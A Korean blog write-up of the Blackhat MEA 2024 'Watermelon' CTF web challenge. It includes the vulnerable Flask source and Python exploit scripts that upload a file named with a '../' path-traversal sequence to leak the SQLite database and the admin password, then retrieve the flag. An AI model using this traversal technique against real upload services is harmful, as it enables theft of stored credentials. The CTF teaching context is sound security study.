[Write-up] Blackhat Mea 2024 - Watermelon

2024. 9. 4. 21:24정보보안/web

반응형

Blackhat Mea 2024 Quals에서 출제된 Watermelon 챌린지 Write up

watermelon.zip

from flask import Flask, request, jsonify, session, send_file
from functools import wraps
from flask_sqlalchemy import SQLAlchemy
import os, secrets
from werkzeug.utils import secure_filename



app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db.db' 
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SECRET_KEY'] = secrets.token_hex(20)
app.config['UPLOAD_FOLDER'] = 'files'


db = SQLAlchemy(app)

class User(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(80), unique=True, nullable=False)
    password = db.Column(db.String(120), nullable=False)

class File(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    filename = db.Column(db.String(255), nullable=False)
    filepath = db.Column(db.String(255), nullable=False)
    uploaded_at = db.Column(db.DateTime, nullable=False, default=db.func.current_timestamp())
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)

    user = db.relationship('User', backref=db.backref('files', lazy=True))


def create_admin_user():
    admin_user = User.query.filter_by(username='admin').first()
    if not admin_user:
        admin_user = User(username='admin', password= secrets.token_hex(20))
        db.session.add(admin_user)
        db.session.commit()
        print("Admin user created.")
    else:
        print("Admin user already exists.")

with app.app_context():
    db.create_all()
    create_admin_user()

def login_required(f):
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if 'username' not in session or 'user_id' not in session:
            return jsonify({"Error": "Unauthorized access"}), 401
        return f(*args, **kwargs)
    return decorated_function


def admin_required(f):
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if 'username' not in session or 'user_id' not in session or not session['username']=='admin':
            return jsonify({"Error": "Unauthorized access"}), 401
        return f(*args, **kwargs)
    return decorated_function

@app.route('/')
def index():
    return 'Welcome to my file sharing API'

@app.post("/register")
def register():
    if not request.json or not "username" in request.json or not "password" in request.json:
        return jsonify({"Error": "Please fill all fields"}), 400
    
    username = request.json['username']
    password = request.json['password']

    if User.query.filter_by(username=username).first():
        return jsonify({"Error": "Username already exists"}), 409

    new_user = User(username=username, password=password)
    db.session.add(new_user)
    db.session.commit()

    return jsonify({"Message": "User registered successfully"}), 201

@app.post("/login")
def login():
    if not request.json or not "username" in request.json or not "password" in request.json:
        return jsonify({"Error": "Please fill all fields"}), 400
    
    username = request.json['username']
    password = request.json['password']

    user = User.query.filter_by(username=username, password=password).first()
    if not user:
        return jsonify({"Error": "Invalid username or password"}), 401
    
    session['user_id'] = user.id
    session['username'] = user.username
    return jsonify({"Message": "Login successful"}), 200

@app.get('/profile')
@login_required
def profile():
    return jsonify({"username": session['username'], "user_id": session['user_id']})

@app.get('/files')
@login_required
def list_files():
    user_id = session.get('user_id')
    files = File.query.filter_by(user_id=user_id).all()
    file_list = [{"id": file.id, "filename": file.filename, "filepath": file.filepath, "uploaded_at": file.uploaded_at} for file in files]
    return jsonify({"files": file_list}), 200


@app.route("/upload", methods=["POST"])
@login_required
def upload_file():
    if 'file' not in request.files:
        return jsonify({"Error": "No file part"}), 400
    
    file = request.files['file']
    if file.filename == '':
        return jsonify({"Error": "No selected file"}), 400
    
    user_id = session.get('user_id')
    if file:
        blocked = ["proc", "self", "environ", "env"]
        filename = file.filename

        if filename in blocked:
            return jsonify({"Error":"Why?"})

        user_dir = os.path.join(app.config['UPLOAD_FOLDER'], str(user_id))
        os.makedirs(user_dir, exist_ok=True)
        

        file_path = os.path.join(user_dir, filename)

        file.save(f"{user_dir}/{secure_filename(filename)}")
        

        new_file = File(filename=secure_filename(filename), filepath=file_path, user_id=user_id)
        db.session.add(new_file)
        db.session.commit()
        
        return jsonify({"Message": "File uploaded successfully", "file_path": file_path}), 201

    return jsonify({"Error": "File upload failed"}), 500

@app.route("/file/<int:file_id>", methods=["GET"])
@login_required  
def view_file(file_id):
    user_id = session.get('user_id')
    file = File.query.filter_by(id=file_id, user_id=user_id).first()

    if file is None:
        return jsonify({"Error": "File not found or unauthorized access"}), 404
    
    try:
        return send_file(file.filepath, as_attachment=True)
    except Exception as e:
        return jsonify({"Error": str(e)}), 500


@app.get('/admin')
@admin_required
def admin():
    return os.getenv("FLAG","BHFlagY{testing_flag}")



if __name__ == '__main__':
    app.run(host='0.0.0.0')

위와 같은 app.py 파일이 주어진다. 같이 제공된 dockerfile, docker-compose.yml을 확인해보면

version: '3.0'

services:
  watermelon:
    restart: always
    build: .
    ports:
      - "5000:5000"
    environment:
      FLAG: BHFlagY{testing_flag}
    healthcheck:
      test: ["CMD-SHELL", "curl --silent --fail http://127.0.0.1:5000 || exit 1"]
      interval: 5s
      timeout: 10s
      retries: 3
FROM python:3.10-slim

WORKDIR /app
COPY requirements.txt .

RUN pip install --no-cache-dir -r requirements.txt

COPY . .

EXPOSE 5000


CMD ["python", "app.py"]

 

다음과 같은데, 환경변수로 flag가 설정되어 있다. 다시 app.py로 돌아가서 코드를 확인해보면 존재하는 엔드포인트로는

 

- /register : username, password를 json으로 전달하면 db에 새로운 유저가 create됨.

- /login : json형식으로 username과 password를 전달하면 로그인 됨.

- /profile : 현재 로그인 된 계정의 username과 user_id를 반환함.

- /files : 로컬에 업로드된 파일의 file id와 업로드 시에 전달한 filename, filepath, 업로드 시간을 반환함.

- /upload : ㅍpython의 requests files를 통해서 파일을 전달받고 전달받은 파일을 로컬 폴더에 저장함. 하지만 로컬의 환경 변수를 컨트롤 할 수 있는 몇 가지 예약어들은 filename으로 사용할 수 없음 ( filter )

- /file/<file_id> : 업로드 된 파일의 file_id를 전달하면 해당 파일의 내용을 반환함.

- /admin : admin 조건에 해당할 경우 환경변수로 세팅된 flag를 반환함.


문제를 해결하기 위해서는 admin 계정으로 로그인을 해야한다.  admin 계정으로 로그인하기 위한 몇 가지 방법으로는 

1. admin 계정의 password를 맞춰냄

2. admin 계정의 권한과 똑같은 권한의 계정을 생성해냄

3. admin 계정의 password를 알아내서 로그인

 

1번의 경우, 아래와 같은 이유로 20바이트의 hex가 password로 할당되어서 remote 환경에서는 맞춰내기 불가능에 가깝다고 생각하여 pass했다.

admin password hex

2번의 경우에는 register시 user의 username에 admin이라는 문자열이 들어오는 경우를 필터링 하기 위한 로직이 존재하여, admin과 동일한 username의 계정을 생성해낼수 없다고 생각해서 pass했다.

username filtering

3번의 경우가 가장 exploitable한 경우라고 생각했고, admin password를 알아내기 위해서는 결국 계정 정보가 저장된 db파일을 leak 시켜야한다. 그렇기 위해서는 app.py에 존재하는 기능을 잘 활용하여 lfi를 시도해야한다는 결론에 도달했다.

 

3번의 경우로 flag를 얻어내기 위해서 우선 제공된 docker-compose 파일로 local에서 서비스를 구동시키고, 

sudo docker exec -it <service name> /bin/sh

다음과 같은 명령어로 실행된 docker 프로세스에 들어간다. 이후 local에서 실행 중인 서비스에 존재하는 엔드포인트로 몇 개의 파일을 전달하는 코드를 작성해서 결과를 보았다.

import requests

session = requests.Session()
url = "http://127.0.0.1:5000"

data = {
    'username':'a',
    'password':'a'
}

file = {
    'file' : "test"
}

#res = session.post(url+'/register', json=data) # register


res = session.post(url+'/login', json=data) # login
print(res.text)

res = session.get(url+'/profile', json=data) # profile
print(res.text)

res = session.get(url+'/files', json=data) # profile
print(res.text)

res = session.post(url+'/upload', files=file)
print(res.text)

res = session.get(url+'/file/1')
print(res.text)

session.close()

정상적으로 파일이 폴더에 업로드 되었다. 이제 어느 위치에 업로드 된 폴더가 생성되고, 어떤 폴더에 admin의 계정 정보가 담긴 db파일이 존재하는지 알게되었으니, db파일만 lfi로 얻어내면 해결된다.

 

python의 request 모듈에서 file을 전송할 때 파일명을 db파일이 존재하는 경로로 지정해준 다음 (파일 내용은 아무거나 넣음) 해당 파일을 upload 하였다. 그럼 해당 부분에서 user가 업로드한 파일명으로 폴더를 만드는 과정에서 취약점이 발생하여 db.db 파일이 노출되게 된다.

하단에 정상적으로 admin 계정의 비밀번호가 노출되었다. 

이를 다시 exploit 코드에 기입하여 admin 계정으로 로그인을 시도하면 flag를 얻어낼 수 있다.

 

import requests

session = requests.Session()
url = "http://a0bb5b8b4b3a569267a9f.playat.flagyard.com"

data = {
    'username':'admin',
    'password':'0afc1e0ed61beb49f5f41838bcb0d8bf091b2796'
}
filename = 'test.txt'
file = {
    'file' : ('../../../../app/instance/db.db', open(filename, 'rb'), 'text/plain')
}

res = session.post(url+'/register', json=data) # register


res = session.post(url+'/login', json=data) # login
print(res.text)

res = session.get(url+'/profile', json=data) # profile
print(res.text)

res = session.get(url+'/files', json=data) # profile
print(res.text)

res = session.post(url+'/upload', files=file)
print(res.text)

res = session.get(url+'/file/1')
print(res.text)

res = session.get(url+'/admin')
print(res.text)

session.close()

BHFlagY{441aa987ba4839d97d9a620af4913d73}

반응형